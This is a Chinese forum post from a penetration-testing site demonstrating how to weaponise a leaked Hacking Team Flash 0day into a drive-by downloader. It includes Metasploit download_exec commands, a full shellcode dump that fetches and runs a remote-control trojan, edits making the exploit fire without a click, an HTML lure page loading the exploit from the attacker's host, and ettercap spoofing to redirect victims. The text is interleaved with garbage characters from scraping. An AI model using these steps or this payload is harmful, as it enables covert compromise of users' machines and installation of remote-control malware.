中国网络渗透测试联盟

标题: flash 0day之手工代码修改制作下载者实例入侵演示 [打印本页]

作者: admin 时间: 2018-10-20 20:28
标题: flash 0day之手工代码修改制作下载者实例入侵演示

; h2 Y/ M- P3 P4 `' {1 M6 t) E 三、flash 0day之手工代码修改制作下载者实例入侵演示 8 b' G6 F& @. a5 l3 w; z/ x

4 O) _4 Z8 Y# D2 K2 } 利用到的工具： & E1 S# I4 @: `) h

3 U$ O" a' V1 s- R Msf " v; T* V- B8 M4 B

. G$ D/ n J3 q) T Ettercap ; o$ }: v/ |- Q- R

! _6 J9 }$ u9 z$ G Adobe Flash CS6 ( z/ L! x" q9 j( @

; U" o9 M* m( f# M Hacking Team Flash 0day-可冲破Chrome沙盒-Evil0X源代码一份 1 J6 h R0 c1 k# \8 ?

% v/ }' \ M7 w' H* J/ \- l+ p D 下面我们就开始演示入侵，利用msf生成shellcode,首先打开msf执行use windows/download_exec，show options 9 S* w+ N5 H+ ]6 c) Z5 D, A' b

, s5 U# |/ s+ g( i) I( g 如图： 9 ]: b0 {/ f! T3 S6 ^

' W6 x8 S* _. o4 v0 \; X - [$ o" c+ u, a! o7 V4 o. Y

7 y |, E+ ^: {2 @& P z3 J/ | 2 ?8 c9 V4 ?% x

! R' L4 r8 i k; R# `1 u 然后set EXE system.exe,再执行set URL,需要说明一下URL就是我们的马的下载地址，这里我们用远控马，远控配置使用不再详细说明。。。如图: 5 C% O- C( v! A5 ]" P

6 H; J! r5 j6 |$ \& T6 A8 R2 b" _ : G% a( ~; ~0 P2 P7 V: _8 y

& i. _, o, g: p% g) ?" R * n) H2 U, b1 X+ Y2 q M4 `. E' ^& X

0 N( T' d- r2 k( \5 g 然后执行generate -t dword生成shellcode，如下： * @0 O5 S U1 L9 A8 v# L

. Z1 j( J% z0 F3 Q - _. f4 @9 i, P: ?' {( L

. B" d' U! q8 }0 C8 U8 O 复制代码到文本下便于我们一会编辑flash exp，如下： . C: Y, Q+ |, A; U2 x& x1 Q

! V/ u1 p% \3 r: _8 ^' ~3 Z$ N 0x0089e8fc, 0x89600000, 0x64d231e5, 0x8b30528b, 0x528b0c52, 0x28728b14, 0x264ab70f, 0xc031ff31, S4 {! @( R, r, f. {

' C' {1 ^5 K8 P5 O7 S4 k! A 0x7c613cac, 0xc1202c02, 0xc7010dcf, 0x5752f0e2, 0x8b10528b, 0xd0013c42, 0x8578408b, 0x014a74c0, e, ~+ s- K% J+ }% A$ ~

4 }! o( P' X9 E1 K5 w/ ^& v% j 0x488b50d0, 0x20588b18, 0x3ce3d301, 0x8b348b49, 0xff31d601, 0xc1acc031, 0xc7010dcf, 0xf475e038, u7 M% M- S. ?" B

6 U( E( i7 L% g x: E 0x3bf87d03, 0xe275247d, 0x24588b58, 0x8b66d301, 0x588b4b0c, 0x8bd3011c, 0xd0018b04, 0x24244489, ) c3 u; E( k+ ~& ]4 L

- M2 c+ U6 g" a- j4 Q 0x59615b5b, 0xe0ff515a, 0x8b5a5f58, 0x5d86eb12, 0x74656e68, 0x69776800, 0xe689696e, 0x774c6854, , B j2 Y& t: S& F2 Z' ^

7 i/ ]$ U4 W0 a0 I) a4 H. _- a 0xd5ff0726, 0x5757ff31, 0x68565757, 0xa779563a, 0x60ebd5ff, 0x51c9315b, 0x51036a51, 0x53506a51, 3 w9 U; R; v! r4 Y2 j) f1 B

% y2 E; Q3 ^- A, l, y, X! Z 0x89576850, 0xd5ffc69f, 0x31594feb, 0x006852d2, 0x52846032, 0x52515252, 0x55eb6850, 0xd5ff3b2e, " _, m6 o# c: I

" p. B2 V' L6 M0 [# S$ t 0x106ac689, 0x3380685b, 0xe0890000, 0x6a50046a, 0x7568561f, 0xff869e46, 0x57ff31d5, 0x56575757, % E4 p- W- Y2 B

: P/ _) B1 W, K* c$ c 0x18062d68, 0x85d5ff7b, 0x4b1f75c0, 0x007c840f, 0xd1eb0000, 0x00008ee9, 0xfface800, 0x732fffff, & @0 I9 h/ K# y4 H4 F* V

# X& @/ J5 H3 G V% A 0x65747379, 0x78652e6d, 0x6beb0065, 0x505fc031, 0x026a026a, 0x6a026a50, 0xda685702, 0xff4fdaf6, : s0 A2 i }9 P4 G) T1 D% Y

+ T3 K2 q9 S& @, C7 R 0xc03193d5, 0x0304b866, 0x8d54c429, 0x3108244c, 0x5003b4c0, 0x12685651, 0xffe28996, 0x74c085d5, 2 _/ ^* a) E+ s" E

6 Q. n' k5 [8 U, s- n 0xc085582d, 0x006a1674, 0x448d5054, 0x53500c24, 0xae572d68, 0x83d5ff5b, 0xceeb04ec, 0x96c66853, , h7 I: t. u7 {# T' ~9 p2 J) z U$ o

' W9 x9 H) z; {/ a 0xd5ff5287, 0x6857006a, 0x876f8b31, 0x006ad5ff, 0xa2b5f068, 0xe8d5ff56, 0xffffff90, 0x74737973, 1 A) O9 ]1 ^) r6 Q+ e; u3 O

9 y5 P3 H/ v2 }) c3 Q 0x652e6d65, 0xe8006578, 0xffffff08, 0x2e737378, 0x64696162, 0x6b682e6f, 0x00000000 : O# D+ h6 k% m* q

7 _( @0 o9 e1 A5 { $ o& c, K1 o4 Q. a& F* z

! ]! \' R9 \: g* c } 7 B: c( v$ J" e* E% j% g. U9 x# p

) h, \3 W. f; N0 y7 f 下面我们来修改flash 0day exp，需要修改三个文件，分别为： ! Z) g$ b( P+ X: N

& f4 Z) g* U* o2 F5 F$ S8 ^ # w% ^# @ i! n6 \: [

& b4 t$ t, I' J4 U8 }: M 先修改ShellWin32.as，部分源代码如图： ' J, w s9 c# k9 w$ M3 }

9 t3 K+ p+ y6 D0 i+ C$ m % \0 [% p1 Y! I2 P/ E

& G! \( t$ [2 U y) w, ~ 我们需要把标记处[]中的代码改成用msf生成的代码，修改后如下： 1 x. E+ \6 P1 m* Z9 c% {

+ a9 ^+ s, A7 {2 W& S 6 F$ m: E) `; C

4 P3 L- d$ f, U! d. Y9 u 然后保存，ShellWin64.as的修改方法如上述，不再演示，下面我们来修改myclass.as,这里需要说明一下，因为此exp生成的利用程序，不能直接自动触发flash漏洞，也就是需要点击按钮才可以，实际上在做渗透的时候需要把它搞得更完美，所以就需要修改，修改方法：搜索myclass的某个字符doc.addchild(btn);如图： " q) _- |# R; K* y; R* A

5 K9 N! z, Y% N! m % m4 q3 s8 T+ E

2 j1 i" L/ Z; g0 j/ b: k2 T: Q1 g: | 换行在后面加一句TryExpl();注意是l不是数字1，然后如图： 3 y) {0 _8 q% Y9 v: ~/ ^6 p0 r

% M/ s) B; k* c # Q# f( k+ I. [/ ?9 G6 Q

2 O# {8 }6 ^1 e* K! ?' w3 Z , {3 ?( i6 P1 ~0 N' ^+ |* {

3 [& `3 C3 R0 V' S ! i* \ j9 y- g |7 f* Y

+ {) x- b0 \' L5 \8 A6 v4 j+ t* M4 y 然后点保存，下面我们来编译一下，打开 + F) I2 X6 C; H) j' I/ r6 I

; ?* L) h/ l8 I; d exp1.fla然后点文件-发布，看看编译没错误 . b# k1 A8 O) \, b+ ?1 L0 t& Q; b2 q

. i/ j9 J( M: L# E 8 P% D- s9 V2 q

' C" A, a; B9 N* ^+ d( H' h % J6 B& i# a* S+ ^- q" `/ p

0 {) Q1 X* S* h/ h0 a% h. ` 1 D& ~) m$ B2 R! B* G' t2 w7 R3 Q2 a7 {

0 e( h4 m$ @ ^- o' S + O) b7 {- U2 Z) V! j) B/ g

, c2 r" S# W/ d 然后我们把生成的 6 k/ A+ D' T( A& R5 e

( i) n f* g' } exp1.swf丢到kailinux 的/var/www/html下： $ a* e% k! _" F$ f z8 l: z# {9 F

& ?, ^- h5 d' V1 M 然后把这段代码好好编辑一下 0 Z" p* U4 _0 E4 O9 g

( S2 ~: F4 M/ F& m' \- X& V N% W% u$ G- b2 \

& t5 z1 s8 V- g ) }% K- e1 z, }8 F" G

: F- ^% z& D% D " S2 ~$ ~8 u9 M+ c6 {! I2 e

/ J' z3 A) K7 K& o: r" G9 _1 p3 o + T- m6 E; K6 b

& t. m( c+ u2 u* U& M. c% M, F9 c ; X& t) s' P- a7 g8 O: X: G

: R# P$ t! {1 Z5 _2 [ 3 M4 m) H7 Y! E4 q6 t

( }3 [0 V3 c( u# {' \: @ <!DOCTYPE html> - k8 v' A: K4 C# U) u' d

, Q. S- u+ \& c8 C <html> 6 G; C2 P9 S. \2 z

! X; K# l: W3 {) E t <head> ! e' i& S& @2 z* g$ c

: @" l3 o' o3 A0 b% J <meta http-equiv="Content-Type" content="text/html; - ]) p8 k- Z2 B% R* x7 C/ M

4 u6 M/ k- B3 ~) } { charset=utf-8"/> ; \, X: j* e o

3 s6 ?6 F& ^* J/ R8 W </head> ) H% B$ {0 J! S' y; I" y+ |

/ ?, ~, J8 q; d9 b1 o <body> 4 y- C) f6 r8 q8 J! O! P4 @8 @5 K$ S

) E$ z0 b# N) _ <h2> Please wait, the requested page is loading...</h2> 6 `% K: w9 ]' k4 y1 |

! C& V+ [& Z7 b( Z' a6 w9 Y <br> ' ?6 }2 i' d# i

/ _& q( i1 ?- B- ~7 N <OBJECT % j: f6 w3 J% k' b4 }

$ V, S: ~6 S: c classid="clsid27CDB6E-AE6D-11cf-96B8-444553540000" WIDTH="50" HEIGHT="50" id="4"><ARAM NAME=movie 7 `; ~& @# v" }4 D4 o6 _" V+ P

, |2 z+ h* }- Q" h/ T# `2 ]# | VALUE="http://192.168.0.109/exp1.swf"></OBJECT> 4 l) p0 G4 y7 N$ A/ O

9 }" C' [. R& [# q </body> 8 h* ^. M6 Q t7 _: |

( N! L- ~0 N# Z9 B6 `% a <script> 8 J. R$ b2 e; c/ K" e' U

8 \, u$ h% \& n2 D setTimeout(function () { . t) y& U0 z }; e& C: @- a( N

% b; p+ ]& R# t) L 7 M( x# w# O0 Y

6 L2 S$ \5 O( A* w window.location.reload(); ! w% I, V5 X) A& L

/ e/ C: @: @. I }, 10000); ! _+ R" l& N- [6 U1 G

* [5 q6 n. v% t+ o1 F0 ` ; T+ N1 a( }: r, V/ f

5 B$ _( c( \1 A3 s </script> 6 j! h* P1 j1 S

7 _9 R* J- u- S3 N+ r% ` </html> ( Y6 q( x0 R3 h. Y

" i0 W9 v1 X* S u( F' t; [9 E0 v. E

; c. H1 n& T/ _ 注意：192.168.0.109是kali的ip地址，这时候我们需要service apache2 start启动一下web服务，然后将上面的html保存为index.htm同样丢到kali web目录下，测试访问链接存在如图： 5 O: V6 @/ t+ g5 b/ C$ {

5 M# n O ] ~9 A. f$ W) g ' k9 ~9 U- ?2 t+ S3 {1 g

* q" z: v6 |9 J0 R 8 z% b* t; ?) D- f8 b% F1 P

" W$ w1 ?) P" }$ T - M+ ?' {' H9 c

% V8 ~- S$ X; Q" K6 F 8 ^' x% H7 ~ R# [% A$ u1 W

8 S- }6 ]6 e- L+ D2 T ) [ X/ t3 X# D9 X- J/ C7 t2 p

/ P( A( ?1 @% S4 x 下面我们用ettercap欺骗如图： 6 H2 s- Q# x. W6 C

' W1 t. O) J5 U1 {( T, Q, s ; d0 n, t1 K( M. v' s* J

8 D8 B9 G+ F" ]+ w7 C. N& D; \ 2 p5 w5 _8 }5 M; g4 Z6 r

1 U2 b2 C' R( a7 c( K9 q 下面我们随便访问个网站看看： - C1 O: O* C: q' O

- G; x( X( o U- e5 d4 i 我靠我发现直接用ettercap欺骗物理机装了腾讯管家照样可以欺骗成功，如图： ! B0 ^% H, J9 U' H

; b" Y5 S1 S1 \/ h& ~* b0 T 8 k1 _! v5 [( s8 d2 Y" e4 {

; u; C& t- f3 W8 U 我们看另一台， 6 W8 p4 t8 e& Q8 I B

% N& }( j" g' U' W* P 提示这个错误，说明木马是成功被下载执行了，只是由于某些原因没上线而已。。。 k5 W. u1 S$ C w9 ?

欢迎光临中国网络渗透测试联盟 (https://cobjon.com/)